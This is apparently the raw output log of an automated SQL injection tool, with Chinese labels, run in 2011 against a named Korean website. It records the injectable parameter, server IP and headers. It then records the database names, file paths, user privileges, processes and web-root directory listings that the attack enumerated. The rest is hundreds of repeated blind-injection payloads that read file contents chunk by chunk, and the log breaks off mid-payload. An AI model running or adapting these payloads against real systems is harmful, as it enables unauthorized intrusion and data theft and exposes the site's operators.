■漏洞信息:============================================================
 ・URL:http://www.jdractors.com/Community/BF_List.asp?BF_Cate=0&BF_SearchKind=&BF_SearchString=&gotoPage=144&BF_Kind=1
 ・页面标题：虐令葛胆 酒开胶鸥 - 楷啊浚磐抛牢刚飘
 ・参数:BF_Cate=0&BF_SearchKind=&BF_SearchString=&gotoPage=144&BF_Kind=1
 ・方法:GET
 ・类型:Numeric
 ・利用方法:And
 ・脚本语言:asp
 ・IP:221.143.48.226
 ・数据库:SQL Server
 ・HEAD:
HTTP/1.1 200 OK
Connection: close
Date: Sun, 03 Apr 2011 11:34:37 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 51622
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQQQDRQRC=HLIPHFLDBLICGJPLMJDNAGOA; path=/
Cache-control: private



■数据库信息:============================================================
- 数据库名：YGENT
- 用户名：dbo
- 版本：Microsoft SQL Server  2000 - 8.00.2039 (Intel X86) 
	May  3 2005 23:18:38 
	Copyright (c) 1988-2003 Microsoft Corporation
	Enterprise Edition on Windows NT 5.2 (Build 3790: Service Pack 2)

- 服务器名：SERVER
- 服务名：MSSQLSERVER
- 系统用户名：ygent

 ・当前用户权限：
sysadmin(sa): 0
dbcreator): 0
bulkadmin: 0
diskadmin: 0
serveradmin: 0
public: 1
db_owner: 1
db_backupoperator: 0
db_datawriter: 0

 ・数据库信息:
db_name	filename
----------------------------------------------------------------------------------------------------
BGH	C:\Program Files\Microsoft SQL Server\MSSQL\data\BGH_Data.MDF	
KSIE	C:\Program Files\Microsoft SQL Server\MSSQL\Data\KSIE_Data.MDF	
master	C:\Program Files\Microsoft SQL Server\MSSQL\data\master.mdf	
model	C:\Program Files\Microsoft SQL Server\MSSQL\data\model.mdf	
msdb	C:\Program Files\Microsoft SQL Server\MSSQL\data\msdbdata.mdf	
Muziq	C:\Program Files\Microsoft SQL Server\MSSQL\Data\Muziq.mdf	
Northwind	C:\Program Files\Microsoft SQL Server\MSSQL\data\northwnd.mdf	
pubs	C:\Program Files\Microsoft SQL Server\MSSQL\data\pubs.mdf	
tempdb	C:\Program Files\Microsoft SQL Server\MSSQL\data\tempdb.mdf	
YGENT	C:\Program Files\Microsoft SQL Server\MSSQL\Data\YGENT_Data.MDF	

 ・SQL Server用户名列表：
用户名		角色		安全编号
----------------------------------------------------------------------------------------------------
dbo			08  6 2000  1:27AM	
guest	.	.	08  6 2000  1:27AM	

 ・数据库相关进程信息:
程序名	状态	主机名	主机进程ID	命令行	NT用户名
----------------------------------------------------------------------------------------------------
取记录数失败，使用设定值：5
Internet Information Services	sleeping	SERVER	3160	AWAITING COMMAND	IUSR_COM	
Internet Information Services	sleeping	SERVER	2676	AWAITING COMMAND	IUSR_COM	
Internet Information Services	sleeping	SERVER	2676	AWAITING COMMAND	IUSR_COM	
Internet Information Services	sleeping	SERVER	2676	AWAITING COMMAND	IUSR_COM	
Internet Information Services	sleeping	SERVER	2676	AWAITING COMMAND	IUSR_COM	

 ・链接的服务器信息:
服务器名	服务器产品	提供者名	数据源	位置	服务器网络名
----------------------------------------------------------------------------------------------------
SERVER	SQL Server	SQLOLEDB	SERVER		SERVER	

 ・数据库用户登录信息：
用户名	密码HASH	数据库编号	语言	时间1	时间2
----------------------------------------------------------------------------------------------------
取记录数失败，使用设定值：5

Dir of D:: 

9bacd911ecaf6188ad470d5b\
BGH\
CONNECT\
FTP\
KSIE\
MUZIQ\
RECYCLER\
System Volume Information\
YGENT\

Dir of D:\MUZIQ: 
一次性获取失败，正在批次获取……

Admin\
aspnet_client\
Community\
Concert\
Html\
Image_Design\
Image\
Include\
Mail\
Member\
Poll\
Statics\
_afterLogin.htm
_beforeLogin.htm
_Default.htm
_Law_Print.htm
_Login.htm
_Login_List.htm
_Logins_bak.htm
_popup.htm
_popup2.htm
_popup3.htm
_SiteMap.htm
BS_Write.asp
Default.asp
Default_Bak.asp
Law_Print.asp
login.asp
LogOut.asp
Main_function.asp
popup.asp
popup3.asp
Sitemap.asp
1  AnD (select tOp 1 substring(f,401,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,601,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,801,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,1001,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,1201,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,1401,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,1601,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,1801,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,2001,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,2201,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,2401,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,2601,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,2801,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,3001,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,3201,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,3401,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,3601,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,3801,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,4001,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,4201,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,4401,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,4601,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,4801,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,5001,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,5201,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,5401,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,5601,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,5801,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,6001,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,6201,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,6401,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,6601,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,6801,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,7001,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,7201,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,7401,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,7601,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,7801,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,8001,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,8201,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,8401,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,8601,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,8801,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,9001,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,9201,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,9401,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,9601,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,9801,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,10001,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,10201,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,10401,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,10601,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,10801,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,11001,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,11201,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,11401,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,11601,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,11801,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,12001,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,12201,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,12401,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,12601,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,12801,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,13001,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,13201,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,13401,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,13601,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,13801,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,14001,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,14201,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,14401,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,14601,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,14801,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,15001,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,15201,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,15401,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,15601,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,15801,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,16001,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,16201,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,16401,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,16601,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,16801,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,17001,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,17201,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,17401,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,17601,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,17801,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,18001,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,18201,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,18401,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,18601,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,18801,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,19001,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,19201,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,19401,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,19601,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,19801,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,20001,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,20201,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,20401,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,20601,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,20801,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,21001,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,21201,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,21401,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,21601,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,21801,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,22001,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,22201,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,22401,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,22601,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,22801,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,23001,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,23201,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,23401,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,23601,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,23801,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,24001,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,24201,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,24401,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,24601,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,24801,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,25001,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,25201,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,25401,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,25601,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,25801,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,26001,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,26201,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,26401,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,26601,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,26801,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,27001,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,27201,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,27401,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,27601,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,27801,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,28001,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,28201,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,28401,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,28601,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,28801,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,29001,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,29201,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,29401,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,29601,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,29801,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,30001,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,30201,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,30401,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,30601,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,30801,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,31001,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,31201,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,31401,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,31601,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,31801,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,32001,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,32201,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,32401,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,32601,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,32801,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,33001,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,33201,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,33401,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,33601,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,33801,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,34001,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,34201,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,34401,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,34601,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,34801,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,35001,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,35201,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,35401,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,35601,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,35801,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,36001,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,36201,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,36401,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,36601,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,36801,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,37001,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,37201,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,37401,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,37601,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,37801,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,38001,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,38201,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,38401,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,38601,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,38801,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,39001,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,39201,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,39401,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,39601,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,39801,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,40001,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,40201,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,40401,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,40601,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,40801,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,41001,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,41201,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,41401,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,41601,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,41801,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,42001,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,42201,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,42401,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,42601,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,42801,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,43001,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,43201,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,43401,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,43601,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,43801,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,44001,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,44201,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,44401,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,44601,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,44801,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,45001,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,45201,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,45401,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,45601,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,45801,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,46001,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,46201,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,46401,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,46601,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,46801,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,47001,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,47201,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,47401,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,47601,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,47801,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,48001,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,48201,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,48401,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,48601,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,48801,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,49001,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,49201,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,49401,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,49601,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,49801,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,50001,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,50201,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,50401,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,50601,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,50801,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,51001,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,51201,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,51401,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,51601,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,51801,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,52001,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,52201,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,52401,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,52601,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,52801,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,53001,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,53201,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,53401,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,53601,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,53801,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,54001,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,54201,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,54401,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,54601,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,54801,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,55001,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,55201,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,55401,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,55601,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,55801,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,56001,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,56201,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,56401,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,56601,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,56801,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,57001,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,57201,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,57401,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,57601,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,57801,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,58001,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,58201,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,58401,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,58601,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,58801,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,59001,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,59201,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,59401,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,59601,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,59801,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,60001,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,60201,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,60401,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,60601,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,60801,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,61001,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,61201,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,61401,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,61601,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,61801,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,62001,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,62201,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,62401,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,62601,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,62801,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,63001,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,63201,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,63401,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,63601,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,63801,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,64001,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,64201,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,64401,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,64601,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,64801,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,65001,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,65201,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,65401,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,65601,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,65801,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,66001,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,66201,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,66401,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,66601,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,66801,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,67001,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,67201,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,67401,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,67601,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,67801,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,68001,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,68201,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,68401,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,68601,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,68801,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,69001,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,69201,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,69401,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,69601,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,69801,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,70001,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,70201,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,70401,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,70601,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,70801,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,71001,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,71201,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,71401,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,71601,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,71801,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,72001,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,72201,200) fRoM sysfile1)=0  1  AnD (select tOp 